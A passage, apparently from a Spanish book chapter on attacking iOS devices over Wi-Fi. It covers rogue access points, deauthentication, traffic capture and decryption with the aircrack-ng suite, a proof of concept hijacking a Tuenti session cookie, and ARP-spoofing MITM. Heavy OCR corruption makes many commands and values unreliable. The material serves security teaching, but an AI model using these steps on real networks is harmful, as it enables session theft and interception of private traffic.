-  Supóngase  un  entorno  en  el  que  un  usuario  ticuc  un  alto  Tnovimicnto  geográfico. 

-  El  usuario  se  conecta  a  20  redes  conocidas  con  asiduidad. 

El  sistema  operativo  iOS  aplica  una  política  ELFO,  Last  In  Fist  Ouí,  para  elegir  a  qué  red  se  conecta 
primero,  es  decir,  la  ultima  red  concciada  es  la  que  tiene  mayor  prioridad,  pero  en  ningún  caso  el 
iistiario  puede  configiirar  dicha  política. 

El  tercer  fallo,  y  el  más  importante,  hace  referencia  a  la  forma  que  tiene  el  dispositivo  de  identificar 
a  Lina  red  conocida.  Esta  política  ha  ido  cambiando  a  lo  largo  de  diferentes  versiones  del  sistema 
operativo.  En  las  versiones  inferiores  a  iOS  4/2 A,  el  reconocimiento  de  nna  rcrl  Wi-Fi  ííc  realizaba 
solamente  por  el  SSl  ü,  es  decir,  tínicamente  por  el  nombre  de  la  red.  Esta  situación  mostraba  un  gran 
vector  de  ataque  a  nii  usuario  malicioso,  ya  que  siniplemente  con  saber  el  nombre  de  la  red  a  la  que 
cí  dispositivo  suele  conectarse.,  se  pEidria  .suplan Lar  dicho  punUj  de  acceso  con  una  red  Lotalincnic 
abiena.  Cuando  los  usuarios  de  iOS  con  versiones  anteriores  a  la  4. 2 A  estuvieran  en  ei  radio  de 
dicha  red  tais  a  se  conectarían  autoiiiátic  ámente. 

1.0  realmente  iiiLcresaTitc  es  que  ante  la  existencia  de  las  dos  redes  en  el  mismo  en  Lomo  físico,  es 
decir,  la  verdadera  y  la  suplantada,  prevalece  la  que  tiene  más  potencia  de  señal. 

El  cuarto  fallo  es  el  recoiiociiniciito  de  la  red  por  nombre  y  descripción,  pero  no  por  ESSTD.  Una 
red  Wi-Fí  puede  identificarse  por  el  SSTD  (nombre),  el  BSxSTD  (MAC  dd  punto  de  aecesíj)  o  el 
ESSID  {Extended  SSÍD)  que  se  utiliza  para  las  redes  que  tienen  más  de  un  AP  que  da  servicio  al 
mismo  SSID.  Por  esta  razón  sí  en  un  edificio  hay  diversos  AF  con  el  mismo  nombre  paia  la  red  Wi- 
Fj,  el  equipo  puede  ir  cambiando  de  un  AP  a  otro  sin  pérdida  de  conexión,  Si  una  red  WireleAs  de 
tipo  infi  aesciuctura  debe  ser  reconocida  por  su  ESí^lD,  sin  embargo  en  fOÓ,  se  permite  canectar  a 
cualquier  AP  que  tenga  el  mismo  SSTD  y  la  misma  LoníigurdJCÍÓTi  de  cifrado  y  autentlcacióiL  Esto 
es  un  fallo  de  seguridad  que  un  usuario  malintenciortado  puede  utilizar  para  suplantar  un  punto  de 
acceso  o  Ro^ueAP  con  la  misma  configuración  que  el  real,  conociendo  eu  nombre,  su  configuración 
y  su  clave  de  cifrado.  Cualquier  usuario  conectado  a  la  red  conoce  la  configuración  de  esta,  por  lo 
que  puede  crear  el  RúgueM'  y  esperar  a  que  el  dispositivo  íOS  se  conecte  y  realizar  un  MÍTM. 
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PoC:  Suplantación  de  puntu  de  acceso 

lin  el  siguiente  escenario  se  dispone  de  los  siguientes  elementos: 

Dispositivo  IOS  con  una  versión  ¡Tiferior  a  la  -^.2.  /  . 

-  Ifn  punto  de  acceso  con  nombre  STecmco  y  con  configuración  de  cifrado  WPA2-PSK. 

Un  plinto  de  acceso  que  actuará  de  Rogue  ÁP  sin  coiifíguraclón  de  cifrado,  por  lo  que  será 
una  red  de  tipo  abierta.  El  punto  de  acceso  se  configurará  con  el  nombre  RTecnico. 


El  usuario  del  dispositivo  se  encuentra  coneetaíio  al  punto  de  acceso  real  y  trabajando  con  su 
dispositivo  sin  ningún  tipo  de  problemas.  L.1  atacante  tras  configurar  el  punto  de  acceso  se  coloca  en 
el  mismo  radio  de  acción  que  ai  otro  /Iccesis'  Poínt^  por  lo  que  existen  dos  dispositivos  con  el  Tnisrno 
SSíD  en  un  entorno  (Isleo.  R1  que  disponga  de  mayor  calidad  de  señal  será  el  que  disponga  de  la 
asociación  con  el  dispositivo  iOS, 


Imagen  1 0.04:  Dispositivo  iOS  conectado  a  una  red  \VPA2. 


¿Cómo  se  puede  conseguir  que  el  dispositivo  íO-S’se  desasocie  del  pimío  de  acceso  real?  Se  puede 
esperar  a  que  se  aleje  de  dicho  punto  de  acceso  y  recoger  la  señal  o  utilizar  la  hermmienta  aírmon-ng 
y  airvptay  ng  pam  lograr  desautenticar  al  dispositivo  del  punto  de  aeeesu.  Esta  acción  se  estudiará- 
más  adelante  en  el  presente  capítulo. 


Tras  realizar  ílicba  acción  el  dispositivo  iOS  se  conecta  al  punto  de  acceso  falso,  gracias  a  que  la 
versión  de  iOS  es  inferior  a  la  4.2. 1  y  solo  conipitieba  el  SSID  paia  conectarse  a  las  redes  Wirekss. 


wi-fi  HHE??] 

una  red., 


10,05:  DÍ5]30®:ilivo  iOS  conectado  a  Lin  /JE 
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Si  por  otro  lado  el  dispositivo  dispusiera  de  una  versión  superior  a  la  comentada  anteriormente 
habría  que  suplantar  la  coiiíiguraclóii  real  del  punto  de  acceso.  En  otras  palabras  habría  ejue  hachear 
la  red  m  Fi  o  disponer  de  los  datos  mediante  otra  vía.  Si  la  red  dispone  de  cifrado  WEP,  hachearla 
sei'ia  bastante  rápido,  si  la  red  tuviera  cifrado  WPA  habría  que  estudiar  los  distintos  casos  posibles, 
como  por  ejemplo  claves  generadas  por  defecto,  cifrado  i’KJP,  compatibilidad  con  WPS,  etcétera. 


2.  Sniffing 

El  sniffing  cfimo  tal  no  es  siiióniiTiü  de  acción  maliciosa,  ya  que  un  adminísüador  de  redes  puede 
necesitar  analizar  el  tráfico  que  circula  por  una  red,  G enera Imeii Le,  el  sniffing  sin  ninguna  técnica 
extra  a  reai  izar  estaba  asociado  a  las  redes  conceiitiadas  o  kub^,  las  cuales  casi  han  desaparecidtj, 
pero  ¿Cómo  se  comporta  una  red  Wírdtss"! 

1  .as  redes  I^Vúeless  de  tipo  abierta  son  hubs  que  permiten  a  un  usuario  que  se  encuentra  en  el  radio 
de  acción  de  la  red  capiurar  todo  npo  de  paquetes  que  circulan  por  c1  aire,  el  cual  es  el  medio  físico 
de  transmisión  de  la  información  entre  el  cliente  y  el  punto  de  acceso. 

Las  redes  de  tipo  abierta  no  ciñan  ni  protegen  con  ninguna  capa  los  paquetes  que  circulan  en  el 
medio  físico,  por  lo  que  un  usuario  malintencionado  que  se  encuentre  en  el  entorno  físico  puede 
capiurar  el  tráfico  e  interpmtaj  lo.  El  usuario  malintencionado  puede  configurar  una  tarjeta  ^Víreiess 
en  modo  monitor  paia  capturar  todo  el  tráfico  que  circula  por  el  aire,  con  independencia  del  iiúniero 
de  redes  que  se  encuentren  en  dicho  entorno  físico. 

El  modo  nioniior  y  el  modo  promiscuo  son  diferentes  formas  de  actuar  por  paite  de  una  tarjeta  de 
red.  R1  modo  monitor  solo  es  posible  en  un  adaptador  IVireiess  y  permiLe  a  un  usuario  capturar  el 
tráfico,  ya  sea  cifrado  WEP,  WPA  o  sin  cifrado  que  circula  en  el  aire.  El  modo  promiscuo  perrniLe 
captinai  y  anali/ar  todo  el  tráfico  que  ^tlega^'  a  fa  tarjeta  de  red^  (ya  sea  Eíherneí  o  Wi-Fi}^  cuando 
el  usuario  ya  se  encuentra  asociado  a  dicha  red,  es  decir,  cuando  dispone  de  autorídad  pai'a  estar 
conectado  a  la  niisrna. 


Conexión  a  una  red  Wircless  abierta 

Como  se  ha  mencionado  anteriormente  cunccLarsc  a  una  red  de  tipo  abierta  tiene  sus  peligros  por 
parte  de  los  usuarios.  Existen  diversas  con figuraci unes  de  este  tipo  de  redes,  como  por  ejemplo  la  de 
instalar  un  portal  cautivo  para  dar  acceso  a  internet,  aunque  el  tráfico  entre  el  punto  de  acceso  y  el 
cliente  va  sin  ningún  tipo  de  cifrado.  Por  otro  lado  un  atacante  pudría  utilizar  vulnerabilidades  de  ios 
dispositivos  íOS^  (como  se  ha  mcnciunad*]  anteriormente),  para  lograr  que  uno  de  estos  dispositivos 
se  asocie  a  un  Rogiáf^  AP. 

Si  se  utilizará  un  Rogue  AF  lo  más  nomial  sería  que  este  repartiera  dirección  TP,  DNS  y  puerta  de 
enlace,  siendo  esta  dltinia  una  máquina  dcl  atacante  por  donde  pasaría  todo  el  tráfico  hacia  Internet. 
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Realmente  no  sería  necesario  esto,  ya  que  simplemente  con  el  hecho  de  no  utilizar  cifrado  en  el 
medio  de  trantsmirídn.  rí  tráfico  puede  xHlt  capLaradu  e  iiiLcrprctado. 

El  procedimiento  para  capturar  el  tráfico  de  un  a  red  Wireless  abierta  sería  el  siguiente: 

"  Taijeta  i^Vireíess  en  modo  monitor  pai'a  captiu'ar  todo  tipo  de  tráfico  que  circule  por  el  aire, 
mediante  el  uso  de  la  herraiiiicrita  airmon-ng. 

Medíante  el  uso  de  la  herramienta  airodump-ng  se  pueden  '""atrapar"'  todos  esos  paquetes 
que  eirculaD  en  el  aire,  visualizar  direcciones  MAC  de  los  puntos  de  acceso,  ver  máquinas 
asociadas  a  dichos  puntos,  YÍsualizai  a  qué  redes  Wireiess  se  oouectaii  habitualmente  los 
clientes  aunque  ja  red  no  se  encuentre  en  c1  prcHeute  enlomo  físico,  calidad  de  la  señal, 
etcétera.  Además,  esta  hen  amienta  permite  volCv^r  a  un  fichero  de  tipo  CAP  el  tráfico 
captuiado,  para  poder  ser  visualizado  y  analizado  con  henainientas  como  Wif^eshark,  NetñH?f^k 
Míneos  etcétera, 

--  Además,  se  pueden  utilizar  smffers  que  filtren  y  se  queden  con  ciertos  campos  que  puedan 
interesar;,  como  contraseñas,  cookies^  etcétera. 


Conexión  a  una  red  Wireless  de  tipo  WEP 

Cuando  la  red  es  de  tipo  WEP  o  incluso  WPA,  se  puede  realizar  el  niísnio  procedimiento  que  en 
el  apartado  anterior.  El  útiiü<j  ineonvcnicuLe  que  existe  es  que  el  tráfico  en  iré  el  cliente  y  el  punto 
de  acceso  se  envía  ciliado.  Si  ei  usuario  malintencionado  emplea  tiempo  en  conseguir  la  clave  de 
acceso  a  la  red  o,  poi-  cualquier  oirá  razón  ya  la  tiene,  puede  capturar  el  tráfico  y  visualizarlo,  sin 
necesidad  de  asociarse  al  punto  de  acceso.  Este  hecho  es  inieresante,  ya  que  pemnite  al  atacante  uo 
regisímr  su  dirección  física  o  cualquier  otro  dato  en  el  punto  de  acceso. 

Paia  r$aliz£u*  el  descifrado  de  paquetes  capturados  mediante  el  uso  de  la  contraseña  de  la  red  M-Fí 
se  debe  uLilizur  la  herramicnñi  atidecnp-ng.  Esta  ulilukd  pcrtefiecc  a  la.  suite  de  amTaok-ng. 

La  operativa  a  llevar  a  cabo  en  esta  ocasión  y  en  este  escenario  es  la  sig Lítente: 

-  Se  dispone  de  una  tarjeta  Wireless  en  modo  monitor  mediante  la  herranitenta  aijinon-ng. 
Con  aimduinp-ng  se  captura  todo  el  tráfico  que  cÍTeula  por  el  medio  íisico,  en  este  caso  el 

aire.  Se  puede  filtrar  por  bssíd,  canal,  tipo  de  tráfico,  etcétera, 

-  Una  vez  que  se  dispone  de  la  captura  eman  ñcliero  CAP,  si  se  visualiza  se  verían  las 
tramas  S02.11  sin  poder  ver  que  ericapsulan  en  su  inierion  a  diferencia  de  lo  que  ocurre  eu 
una  configuración  de  red  abierta. 

-  Para  descifrai  el  tráfico  capturado  se  necesita  la  confia  seña  de  la  md  Wireless.  Para  ello 
se  dispone  de  la  herramienLu  alrdecap-ng^  cuyo  fuñe  ion  amiento  se  expone  a  continuación. 

Airdecrfp-tyg  dispone  de  una  sinraxis  realinente  sereilla  y  íliferentc  para  redes  WEP  o  WPA.  Para 
las  redes  WEP  la  sintaxis  es  la  siguiente  airdecap-fig  -tv  CXAVFIlK^4DFCJb'MLSL\'PUNl 
<ítf'chivo.c¿ip-^.  El  patúiiielro  —w  indica  la  clave  de  la  red  WEP,  la  cual  debe  ser  conocida  a  priori, 
y  debe  ser  escrita  en  formato  hexadecinriaf  Para  obtener  el  equivalente  a  ASCII  en  hexadecimal  se 
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puede  utilizar  la  lien'amienta  xxd,  por  ejemplo,  echo  -n  <clm^e  ASCU>  \  xxd^:;h[  resultado  es  ta 
clave  en  forniato  hexadoeimal.  A  con  ti  nii  ación  se  le  puede  pasar  a  airdecap-n^  la  clave  y  el  ñcliero 
CAR 

Para  las  redes  WPA,  la  sintaxis  es  la  siguiente  alrdecap-ng —e  < nombre  de  la  redo  SSID>  -p  <ch7\^ 
7ed  WPá>  <fichero  CAP>.  Se  rieeesitíi  el  handshake  capturado  con  alrodump-ng.  Hay  que  recordar 
que  el  handshake  se  puede  consegnir  en  la  autenticación  de  un  cliente  con  un  punto  de  acceso. 


Lna  vez  que  se  dispone  del  arcliivo  C/VP  dése  í  irado,  se  puede  in  ves  Ligar  el  tráfico  en  plano  y  obtener 
infonnación  contideiicial  de  lavíctirria. 


LaLpha@alptia-pc  capturas  para  ainíecap-nq  -e  vircLass  -p  12345S7891234  captura -01. cap 

Tíital  nuihsr  af  packets  read 

9455 

Total  njiTibar  of  WF?"  data  packets 

ü 

TüLal  lumbar  af  WPA  data  packets 

113 

Nuiber  of  plaintest  ííata  packets 

0 

Nu.Tfktr  of  docrypted  WF“  packets 

0 

Nudber  ci^f  corruptñd  WEP  packets 

0 

lamber  of  dacrypLed  WPA  packets 

e 

Ima,£?eri  10.06;  Dascifranap  tráificíii 


Además,  con  esta  Lcenlca  se  puede  realizar  un  hypass  ante  un  DHCP  deshabilitado  y  conocer  el 
rango  de  direcciones  IP  válido  para  dicha  red. 


PoC:  Híjacking  a  tuenti  en  redes  Wireless 

En  la  siguiente  prueba  de  concepto  se  prepara  el  siguiente  escenario; 

-  I.na  víctima  con  dispositivo  iOS  y  que  se  encuentre  coueciudo  a  una  red  de  tipo  abierta 
o  que  se  encuentre  conectado  a  un  Rogue  preparado  por  un  atacante,  con  configuración 
de  red  abierta. 

í.a  apffcacTÓD  utilizada  por  fa  víctima  es  ¡a  propia  de  íuenti  para  lOS.  Esta  aplicación 
manda  la  caokie  de  manera  distinta  a  coiiiu  se  realizaría  por  el  navegador  Safaii.  pero  la 
cookle  es  igual. 

Un  atacante  con  una  tarjeta  Wireless  en  iriodíj  monitor  y  volcando  lo  capturado  en  un 
fichero  CAP. 


A  cmiLinuación  se  pasa  a  detallar  la  prueba  de  concepto  de  un  robo  de  sesión  de  (uenit^  de  un  usnariíi 
que  accede  a  través  de  iOS^  teniendo  en  cuenta  que  el  usuarit)  se  ha  conectado  previamente  a  un 
punto  de  acceso  malicioso  crmLrolado  jwir  el  atacante,  o  estando  la  red  abierta  o  sin  contraseña,  o 
coutraí^cna  WEr  conocida  por  el  atacante,  o  en  algunos  casos  también  con  WPA  (siempre  que  se 
conozca  la  clave). 

Una  vez  que  la  víctima  se  ha  conectado  ai  punto  de  acceso  tnalicioso,  se  puede  poner  la  tarjeta  Wi-Fi 
del  equipo  aiacaute  en  modo  monitor  con  aimion-ng,  tal  y  como  se  puede  apreciar  en  la  siguienLe 
imagen. 
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alnííin'-ng  síart  wlanfi 

=Dund  2  processes  that  roiilri  cFiuse  traubls. 

[f  airodump-ng,  fliraplay-ng  or  airtun  ng  sLups  warkiiig  after 
j  short  perÍQíi  nf  time,  ynu  ma/  want  to  kill  Cscme  cfí  theffi! 

íID  Uame 

1550  {lhcUciiÍ3 
^eie  dhcii€flu 

>rocess  with  PIO  loai  (ifirp}  fs  ruiming  on  intarface  wlsns 
>rocess  uith  PID  2019  Í  dhclÍErt3í  l  unning  oti  iaterface  wlñn0 

[nterface  Chip&et 

jlaíiB  Ralink  2573 

Imagen  1Q.07:  ConñgirratKfo  cJ  modo  monitor  de  la  tarjeta 

i’ríiÉ  resilizar  el  mencionadn  cambio  de  modo  en  la  taijeta  Wireless,  el  atacante  estam  en  disposición 
de  lanzar  la  aplicación  airodump-ug,  con  la  que  será  capaz  de  ir  capturando  el  tráfico  que  está 
circulando  por  el  aire. 


La  siguieute  tabla  mnestra  una  lisia  con  los  parámetros  más  interesantes  de  dicha  herramienta,  y  su 
descripción  correspondiente. 


Parámetro 

Descripción 

-c 

Piltra  por  el  canal  indicado,  rcct)gicndt>  solo  paquetes  de  los  puntos  de  acceso  que 
trabajan  en  el  canal  especificado. 

-W  ■ 

Vuelca  el  contenido  capturado  en  un  fichero  CAP. 

beacom 

Almacena  ios  beacons^  que  por  defecto  no  son  almacenados. 

—ivs 

Almacena  solo  los  IVS. 

Ttihlu  Í2-.01;  LiyUifle  parkuetios  airodif/rtp-fig. 


El  atacdiiLe  lanzará  la  siguiente  instinccióii  para  capturar  el  tráfico,  siempre  y  cuando  la  interfaz  de 
tipo  monitor  que  haya  crcadti  aírmon-ng  sea  manO: 

airoduTnp-ng—c  <ch<mne!>  -w  <nombre Jichew>  moníL 

Tras  realizar  esta  operativa  durante  unos  minutos,  se  dispone  de  un  fichero  CAP  c!  cual  puede  ir 
siendo  anal  izarlo.  Con  Wireyhark  se  analiza  dicho  fichero  en  busca  de  la  cookie  de  tmmi  de  la 
víctima,  ya  que  recordando  el  escenario,  la  comunicación  cmrc  c1  punto  de  acceso  y  el  dispositivo 
iOS  va  sin  cifrar. 

Utilizando  iin  íiUtíí  de  tipo  htip  conlains  íS:cfe  hítp  contaim  '"tuenüd'  pueden  filtrar 

los  paquetes  que  realmente  interesan  de  la  capium  realizada,  tal  y  como  se  puede  visualizar  en  la 
siguiente  imagen. 


Capítulo  X.  Ataquéis  en  redes  Wi-Fi 
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htrn  erontaln^  “tuentf 


•  Tlrrte 


:í21  24.336932 

aei 

B13  M.2529B2 
a3B  3e  .:á5M6á 
3HÜ  :n :  e3é9ií 
L129  SI.  175535 


¿ésjPIjST  /ipí/  KTT?/1,L 
1¿2|PCST  /api/  KTTP/l.l 
iei  Pn5T  /api/  HTTP/ 1,1 
454  MIST  /api/  HTTP/l.l 
1915  mi  /api/  HTTP/ 1.1 


UppLÍ^Í:tÍJtÍi|/3;-MM!-  fETrCI 
Capjjlical  ÍDfi/}c  -WWW  foTun 
(íippllCütlMl/^-'WriW-  fttlTU 
{applÍC3tÍ0fl,^X-WW-  fQ™| 
{ appl  icatipfj/í  -ww- 1  anuí 


795  WST  /a  pi/  FTTP/ 1 . 1  j;  kicatiaii/x  www-  f  an 


mimwi 


25a  PfflET  /api/  HnP/1.3  ínppTlíatlDn/x-www-form 
/api/  Hrrp/i.i  (Bppiicsti&n/x-ww-fonn. 


fPirll  rrnJir-^it  tiRi  ■  httD://BPÍ.tüer,t i , com/a pi/ ] 


i-l  Llag-based  tea;  tito^g:  applicatior^/x-iww-fom-üi'lHKffljed 


Fíame  F^í^síímhlcd  TtP  Í4es  IJYteíl 


Imagen  I  D.OS:  Cajutura  de  menh  en  íOS. 


seta  5b  55  &5  7B  ?ri  &1  6C 
Elias 

£113  BQ 

PA¿a  BB! 

£133  mMW 

£i4s  BSISSSKI! 


Gracias  a  esta  técnica  y  a  la  cnnfígt] ración  del  entorno  es  posible  capturar  credenciales  o  cookier  sin 
ncccsidaíl  de  realizar  un  A RF  Spoofirig.  ya  que  el  punto  de  acceso  no  licnc  ningijo  tipo  de  cifrado  con 
los  clientes  asociados.  Para  evitar  diclia  situación  sería  recomendable  utilizar  un  cifrado,  evitando  el 
cifrado  WEP,  ya  que  este  es  fácil  mente  atacable. 


Una  vez  que  se  ha  obtenido  la  caokie  de  iuenti  es  posible  acceder  a  la  cuenta  de  la  víctima,  cuya 
sesión  ha  sido  capturada.  Pai'a  ello  basta  con  utilizar  uiia  aplicación  que  pennita  gestionar  cooldes^ 
como  por  ejejiiplo  Conki^s  Manager  \ ,  el  cual  es  un  plugin  de  Fire/bx  que  permite  reali^áT  dicha 
acción.  En  la  siguiente  imagen  se  puede  visualizar  la  configuración  de  ía  cookie  extraída  de  la 
capuira  analizada  con  MreAicirk. 


Imagen  10.09:  Confi,gti.raoión  de  la  cookk^.  ^LLplanliiüu  de TííCjt/í, 


216 


Hacking  de  dispositivos  iOS:  iPbone:  &  iPad 


Dtíspucs  díj  realizar  dicha  acción  con  Cüukies  Manager-^  solo  hace  falta  recai'gar  la  página  de  tusnti 
en  el  navegador  Flrefox.  El  resultado  es  el  esperadií,  se  obtiene  acccsíj  a  la  ciicntn  de  la  víctima  si  tí 
necesidad  de  conoeer  sus  credenciales. 


imagea  10.10:  Suplantación  de  la  cuenta  úo  meníL 


3.  Man  in  the  middle 

Generalmente,  la  técnica  de  Mcm  In  The  Middie  es  asociada  por  los  usuarios  con  Allf^Spoofing,  pero 
MTTM  no  es  solo  este  tipo  tic  Leen  i  c  a.  Corrí  tí  se  ha  ido  estudiando  el  MITM  es  posible  i^alizarlo  en 
otras  capas,  por  ejemplo  mediante  unüog?^¿?  AP. 

Como  definición  hay  que  especificar  que  Man  In  The.  Middh  es  el  vector  utilizado  para  lograr  que  el 
tráfico  de  nn  dispositivo  de  una  victima  cii  cule  a  ti  avés  de  la  máquina  del  atacante.  De  este  modo,  el 
atacante  puede  analizar  el  tráfico  y  proceder  a  utilizar  dicha  iníbrmación  en  su  beneficio. 

Los  dispositivos  jOÓ'  también  pueden  caer  en  estas  técnicas  de  MITM  como  se  ha  ido  esLudiando. 
A  continuación  se  detallarán  vías  para  i^ealizai'  ataques  del  tipo  MiTM  sobre  los  dispositivos  iOS. 


ARPSpoofing 

Este  tipo  de  ataques  se  realiza  cuando  el  dispositivo  i05y  el  atacante  se  encuentran  en  la  misma  red, 
por  ejemplo,  a  través  de  una  LAN,  la  cual  dispone  de  urr punto  de  acceso  inalámbrico. 

El  ataque  está  basaílo  en  el  pmLocoh)  ARE,  Address  Teso¡M¿¿úh  Fmiocok  con  el  que  los  dispositivos 
de  una  red  conocen  a  los  otros  elementos  de  la  misma .  Se  debe  partir  de  la  base  de  que  hjs  dispositivos, 
como  equipos,  smar/phones.  swhches,  miííers^  etcétera,  se  comunican  en  una  LAN  a  través  del 
nivel  de  enlace,  Es  decir,  necesitan  conocer  las  direcciones  físicas  de  los  elementos  de  la  red.  El 
protocolo /VRP  pennite  a  los  elementos  de  una  red  conocer  la  dirección  física  dd  resto,  partiendo  dcl 
conocí II liento  de  una  dirección  IR 

Fn  resumen,  ÁT¿2?j  In  The  Aliddíe  es  un  ataque  en  el  que  el  atacante  crea  la  posibilidad  de  leer, 
inyectar  o  modificar  información  que  hay  en  un  canal  en  Iré  2  máquinas  sin  que  ninguna  de  esas 


Captiuío  A.  Ataques  en  redes  Wi-Fl 
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niáqiiiníis  conozca  esia  situación.  \ln  otras  palabras,  iin  usuario  con  malas  intenciones,  se  colocará 
entre  el  equipo  1  y  el  equipo  2.  Cuando  el  equipo  1  envíe  tiáñco  al  equipo  2,  dicho  tráfico  pasará  por 
el  equipo  dcl  alacaritc  en  primer  lugar. 

El  protocolo  ARJ*  dispone  de  dos  tipos  de  mensajes,  request  y  reph^ln  paquete  request  pregunta 
mediante  broadcasi  a  todos  los  elemeniDS  de  la  red  por  la  dirección  física  que  tiene  una  dirección 
IP  eonercLa,  El  elcmcnLo  que  Lciiga  dicha  dircccíóu  IP  couLeslará  con  un  ARP  reply  indicando  su 
dirección  física  en  la  cabecera.  De  este  modo  los  equipos  aprenden  a  asociar  direcciones  fí.sicas  a 
direcciones  IR  Si  un  usuario  malintencionado  utilizara  los  ARP  repiy\  para  engañar  y  envenenar 
las  tablas  de  otros  elementos  se  podría  capturar  el  tráfico  que  no  es  dirigido  paiu  dicho  usuario 
malicioso. 

Como  ejemplo  se  escenifica  ia  siguiente  situación,  un  atacante  utilizará  alguna  herramienta,  como 
puede  ser  cuín,  eUercap  o  arpspoojl  para  llevar  a  cabo  el  arp  spoo/ing.  El  atacante  envenenará 
las  tablas  ARP  de  las  víctimas,  enviando  mensajes  ARP  ‘'engarando'^  a  los  objetivos.  Fste  tipo  de 
ataques  se  realiza  en  redes  con  switches  (conmutadas),  ya  que  en  redes  con  hubs  no  es  necesario. 

El  estado  inicial  de  la  tabla  ARP  del  dispositivo  iüS\  con  dirección  IP  10,0.0.3,  tiene  el  siguiente 
aspecto: 


Dirección  IP 

Dirección  NLAC 

10.0.0.  l  (roLiter) 

CA:FE:CA:FE:CA:FR 

Ei  estado  inicial  de  la  labia  ARP  dei  muter..  con  dirección  IP  10,0.0.1,  tiene  el  siguiente  aspecto: 


Dirección  IP 

Dirección  RLAC 

10.0.0.3 

FA:BA:nA:FA:RA:DA 

El  atacante  enviará  un  par  de  arp  reply,  uno  al  dispositivo  iüS  y  otro  al  nyuter,  con  la  mtención 
de  envenenar  y  falsear  la  información  anLeriur.  Si  el  aiaeunte  dispone  de  la  dirección  MAC 
AA:BB:.A.A:BB:AA:BB,  las  tablas  ARP  de  los  elementos  anteriores  quedarán  de  la  forma  que  se 
muestra  a  continuación: 


Dirección  IP 

Dirección  MAC 

10.0.0,1  (router) 

A.4:BB:AA:BB:AA:BU 

El  estado  inicial  de  la  Labia  ARP  del  muíer,  cüii  dirección  IP  10,0.0.1,  tiene  el  siguiente  aspecto: 


Dirección  IP 

Dirección  MfAC 

10.0.0.3 

AA;BB:AA:BB:AA:BB 

De  esta  manera  todos  los  envíos  de  iráfico  que  Tcafice  e.l  dispositivo  iOS  a  Tnternot  píLsarán  por  Id 
máquma  del  atacante,  capturando  mokies,  credenmles,  información  de  navegación,  y  rodo  el  tráfico 
no  cifrado,  coniprooietieiido  la  privacidad  y  la  confidencial idad  del  usuario. 
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Algo  que  hay  que  tener  cii  cuenta  y  que  lia  causadn  prnhlcmas  a  jTiuchos  auditores  y  usuarios 
malintencionados  es  el  comportamiento  de  1os  dispositivos  móviles  en  geiiemh  e  iOS  en  particular, 
[Vente  a  k  técnica  arp  spoojjug.  Se  recomienda  qite  se  utilice  una  máquina  física  para  llevar  a 
cabo  el  envenenamiento^  ya  que  se  pueden  sufiii’  prob lernas  de  furidonamiento  utilizando  máquinas 
vktunles  para  llevar  a  cabo  d  proceso. 


Redes  abiertas  o  WEP 

La  conexión  a  redes  de  tipo  abiertas  o  con  cifirado  WLPes  prácticamente  símiláL  La  única  diferencia 
ES  el  cifrado  con  el  que  se  protegen  los  paquetes  que  circulan  por  el  aire.  Realmente  realizar  un  arp 
spooñng  o  smjjiár  el  tráfico  de  una  de  estas  dos  redes,  es  indiferente,  ¿Esto  a  qué  es  debido? 

Si  c1  atacante  se  enftenta  a  una  red  abierta,  puede  capturar  el  tráfico  simplemente  "‘observando” 
el  aire  con  aírodump-ug^  mientras  que  a  la  vez  se  pnctlc  conectar  al  punto  de  acceso  abierto  y 
realizai  un  MITM.  El  resultado  es  e)  mismo,  aunque  no  quedan  huellas  de  dicha  acción  si  se  realiza 
capiurando  o  sníffandú  el  tráfico  de!  aire. 

Si  por  el  contrario  el  atacante  se  eiilrenta  a  una  red  con  cifrado  WEP,  se  puede  realizar  iin  MITM 
si  se  dispone  de  la  clave  y  se  eiiCLienlra  con ec Lado  a  la  red,  o  bien,  se  puede  capturar  el  tráfico  que 
circula  por  el  aire  y  después  utilizar  airdecap-ng  para  desciñniio.  En  atiibos  casos  se  necesita  la 
clave  de  acceso  a  la  red  f^íreless,  per  lo  que  el  resultado  vuelve  a  ser  el  mismo,  aunque  de  nuevo  con 
la  técnica  proporcionada  por  ¿iir¿kcap-ng  no  cpjcdan  huellas  de  la  acción. 


Redes  WPA 

VVPA  (Wi-Fi  Proíecíed  Access)  surge  como  una  solución  temporai  de  la  Ífj-Fi  Allkmce  para 
secu rizar  las  redes  ÍVireless  una  vez  que  quedó  de  manifiesto  la  debilidad  de  WEP  (Wired Equivakm 
Privacy),  Mientras  IEEE  trabajaba  en  el  estándar  IEEE  802.111,  cuando  salió  a  la  Inz  la  iVi-Fi 
Áitiance  proporcionó  la  cerLlfiEacióu  W?A2  a  todos  aquellos  dispositivos  que  cumplían  con  las 
cspcEincdcitmcs  marcadas  por  el  nuevo  estándar,  .\nibas  soluciones,  WPA  y  WPA2,  soportan  el 
protocolo  802.  Ix  paiu  la  auten  Líe  ación  En  ámbitos  empresariales  y  la  autenticación  mediante  clave 
compartida  PSK  {Prc-Shnred  Key)  para  los  entornos  SOHO  {Small  Office  and  Home  Office)  y 
ámbitos  domésticos. 

WPA  y  \VPA2  se  difeieiiciari  poco  conceptual  mente  y  ti  i  fi  eren  principalmente  en  el  algoritmo  de 
ciñado  que  ern  pican.  Mientras  que  WPA  basa  el  cifrado  de  las  comunicaciones  en  el  uso  dol  algoritmo 
EKIP  {Temporary  Key  Integrity  FrotocolX  que  está  basado  en  RC4  al  igual  que  WER  WTA2 
utiliza  CCMP  {Counter-modE/CBC’MAC  Pmmrrrjjí).  basado  en  AES  {Advanced  Enaytion  System). 
La  segunda  ilTrcrcncia  notable  se  euctientra  en  el  algoritmo  utilizado  pata  controlar  la  integridad 
del  mensaje.  Mientras  WTA  usa  una  versión  menos  elaborada  para  la  gEncradon  del  código  Miél 
[Message  Integrity  Crjde\  o  códigtj  ''MichaeP\  WPA 2  implemenra  una  versión  mejorada  de  MIC. 

Para  entender  mejor  cómo  poder  realizar  un  ataque  a  este  tipo  de  redes,  prmiero  se  ha  de  analizar  el 
proceso  de  asociación  de  un  cliente  a  la  red  Wirciess,  Indepeiidienteineote  del  sísicma  de  seguridad 
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que  se  elija  para  la  red  (WEP,  WPA-PSK,  WPA2-PSK),  el  proceso  es  el  mismo.  Este  proceso  tendrá 
dos  o  tres  fases  dependiendo  de  si  el  punto  de  acceso  está  emitiendo  tramas  “Beacm  Jramé" .  Si  se 
están  emitiendo  tramas  “Beacon  frame".  el  diente  se  conecta  a  la  red  en  dos  fases,  una  primera  fase 
de  autenticación,  que  podrá  esrar  abierta  o  con  dave  compartida,  y  una  segunda  fase  de  asociación. 

En  el  caso  de  que  no  se  estén  etnitieiido  tramas  "fíeacon  fratne" ,  existe  una  fase  de  prueba  inicial 
